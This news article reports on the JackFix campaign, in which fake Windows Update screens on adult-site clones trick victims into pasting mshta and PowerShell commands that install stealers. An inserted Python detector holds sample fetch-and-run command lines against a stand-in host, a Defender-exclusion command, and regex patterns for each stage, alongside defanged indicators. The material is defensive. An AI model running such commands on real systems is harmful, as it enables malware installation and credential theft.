JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers

By Declan Murphy, November 25, 2025
Cybersecurity researchers are calling attention to a new campaign that leverages a combination of ClickFix lures and fake adult websites to deceive users into running malicious commands under the guise of a "critical" Windows security update.

"Campaign leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising," Acronis said in a new report shared with The Hacker News. "The adult theme, and potential connection to shady websites, adds to the victim's psychological pressure to comply with sudden 'security update' installation."

ClickFix-style attacks have surged over the past year, often tricking users into running malicious commands on their own machines using prompts for technical fixes or for completing CAPTCHA verification checks. According to data from Microsoft, ClickFix has become the most common initial access method, accounting for 47% of attacks.

The latest campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code, indicating that attackers are moving away from the traditional robot-check lures. The activity has been codenamed JackFix by the Singapore-based cybersecurity company.

Perhaps the most concerning aspect of the attack is that the phony Windows update alert hijacks the entire screen and instructs the victim to open the Windows Run dialog, press Ctrl + V, and hit Enter, thereby triggering the infection sequence.


It's assessed that the starting point of the attack is a fake adult website to which unsuspecting users are redirected via malvertising or other social engineering methods, only to be suddenly served an "urgent security update." Select iterations of the sites have been found to include developer comments in Russian, hinting at the possibility of a Russian-speaking threat actor.

"The Windows Update screen is created entirely using HTML and JavaScript code, and pops up as soon as the victim interacts with any element on the phishing website," security researcher Eliad Kimhy said. "The page attempts to go full screen via JavaScript code, while at the same time creating a fairly convincing Windows Update window composed of a blue background and white text, reminiscent of Windows' infamous blue screen of death."

What's notable about the attack is that it leans heavily on obfuscation to conceal the ClickFix-related code, and that it tries to block users from escaping the full-screen alert by disabling the Escape and F11 keys, along with F5 and F12. However, due to faulty logic in that key handling, users can still press Escape or F11 to get rid of the full screen.

The initial command executed is an MSHTA payload launched using the legitimate mshta.exe binary, which in turn contains JavaScript designed to run a PowerShell command that retrieves another PowerShell script from a remote server. The hosting domains are set up so that navigating to those addresses directly in a browser redirects the user to a benign website such as Google or Steam.

"Only when the site is reached out to via an irm or iwr PowerShell command does it respond with the correct code," Acronis explained. "This creates an extra layer of obfuscation and analysis prevention."

    UAC request to grant attackers admin privileges

The downloaded PowerShell script also packs in various obfuscation and anti-analysis mechanisms, one of which is the use of garbage code to complicate analysis efforts. It also attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for the command-and-control (C2) addresses and the paths where the payloads are staged.

To achieve privilege escalation, the malware uses the Start-Process cmdlet with the "-Verb RunAs" parameter to launch PowerShell with administrative rights, and it repeatedly prompts for permission until the victim grants it. Once this step succeeds, the script is designed to drop additional payloads, such as simple remote access trojans (RATs) programmed to contact a C2 server, presumably to drop more malware.
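The chain described above (mshta.exe spawned from the Run dialog with a remote URL, PowerShell fetching a script with irm/iwr, a Start-Process -Verb RunAs elevation prompt, and Defender exclusions being added) gives a defender four observable process-creation events. The following detector is an added example, not code from the Acronis or Huntress reports; it assumes Sysmon-style (ParentImage, Image, CommandLine) fields, that Win+R launches appear with explorer.exe as parent, and that exclusions are created with Add-MpPreference, which the article does not name. All sample events and hostnames are constructed.

```python
import re

# Constructed process-creation events shaped like Sysmon Event ID 1 fields:
# (ParentImage, Image, CommandLine). Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ("explorer.exe", "mshta.exe",
     "mshta https://update-check.invalid/win.hta"),
    ("mshta.exe", "powershell.exe",
     'powershell -w hidden -c "irm https://update-check.invalid/s.ps1 | iex"'),
    ("powershell.exe", "powershell.exe",
     'powershell -c "Start-Process powershell -Verb RunAs -ArgumentList \'-w hidden\'"'),
    ("powershell.exe", "powershell.exe",
     'powershell -c "Add-MpPreference -ExclusionPath C:\\Users\\Public\\stage"'),
    ("explorer.exe", "notepad.exe", "notepad C:\\Users\\alice\\notes.txt"),
]

# Each rule: (stage label, image it applies to, regex over the command line).
# Stage labels are our own names for the steps described in the article;
# Add-MpPreference is assumed to be the cmdlet used for the Defender exclusions.
RULES = [
    ("mshta_remote_url", "mshta.exe", re.compile(r"https?://", re.I)),
    ("ps_remote_fetch", "powershell.exe",
     re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b", re.I)),
    ("ps_runas_loop", "powershell.exe",
     re.compile(r"Start-Process\b.*-Verb\s+RunAs", re.I)),
    ("defender_exclusion", "powershell.exe",
     re.compile(r"Add-MpPreference\b.*-Exclusion", re.I)),
]

def classify(parent, image, cmdline):
    """Return the stage labels one event matches. 'run_dialog_parent' is added
    when a matching mshta.exe is spawned by explorer.exe, which is the parent
    a command pasted into Win+R gets (assumption stated in the lead-in)."""
    image = image.lower()
    hits = [name for name, img, rx in RULES if image == img and rx.search(cmdline)]
    if image == "mshta.exe" and parent.lower() == "explorer.exe" and hits:
        hits.append("run_dialog_parent")
    return hits

def scan(events, min_stages=2):
    """Classify every event and report whether enough distinct stages of the
    chain were seen to raise a ClickFix-style infection alert."""
    per_event = {i: classify(*e) for i, e in enumerate(events)}
    stages = {s for hits in per_event.values() for s in hits}
    return {"per_event": per_event, "stages": sorted(stages),
            "chain_detected": len(stages) >= min_stages}

if __name__ == "__main__":
    result = scan(SAMPLE_EVENTS)
    for i, hits in result["per_event"].items():
        print(i, SAMPLE_EVENTS[i][1], hits)
    print("chain detected:", result["chain_detected"])
```

A single stage (for example a lone irm download) is common in legitimate administration, so the alert requires at least two distinct stages; tune min_stages to the environment's noise level.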

The PowerShell script has also been observed to serve up to eight different payloads, with Acronis describing it as the "most egregious example of spray and pray." These include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, as well as other unspecified loaders and RATs.

"If only one of these payloads manages to run successfully, victims risk losing passwords, crypto wallets, and more," Kimhy said. "In the case of some of those loaders — the attacker may choose to bring other payloads into the attack, and the attack can quickly escalate further."


The disclosure comes as Huntress detailed a multi-stage malware execution chain that originates from a ClickFix lure masquerading as a Windows update and deploys stealer malware like Lumma and Rhadamanthys by concealing the final stages inside an image, a technique known as steganography.

As in the aforementioned campaign, the ClickFix command copied to the clipboard and pasted into the Run dialog uses mshta.exe to run a JavaScript payload capable of executing a remotely hosted PowerShell script directly in memory.

The PowerShell code is used to decrypt and launch a .NET assembly payload, a loader dubbed Stego Loader, which serves as a conduit for the execution of Donut-packed shellcode hidden within an embedded and encrypted PNG file. The extracted shellcode is then injected into a target process to ultimately deploy Lumma or Rhadamanthys.

Interestingly, one of the domains listed by Huntress as being used to fetch the PowerShell script ("securitysettings[.]live") has also been flagged by Acronis, suggesting the two activity clusters may be related.

"The threat actor often changes the URI (/tick.odd, /gpsc.dat, /ercx.dat, etc.) used to host the first mshta.exe stage," security researchers Ben Folland and Anna Pham said in the report.

"Additionally, the threat actor moved from hosting the second stage on the domain securitysettings[.]live and instead hosted it on xoiiasdpsdoasdpojas[.]com, although both point to the same IP address 141.98.80[.]175, which was also used to deliver the first stage [i.e., the JavaScript code run by mshta.exe]."

ClickFix has become hugely successful because it relies on a simple yet effective method: lure a user into infecting their own machine, bypassing security controls in the process. Organizations can defend against such attacks by training employees to better spot the lure and by disabling the Windows Run box via Registry changes or Group Policy.
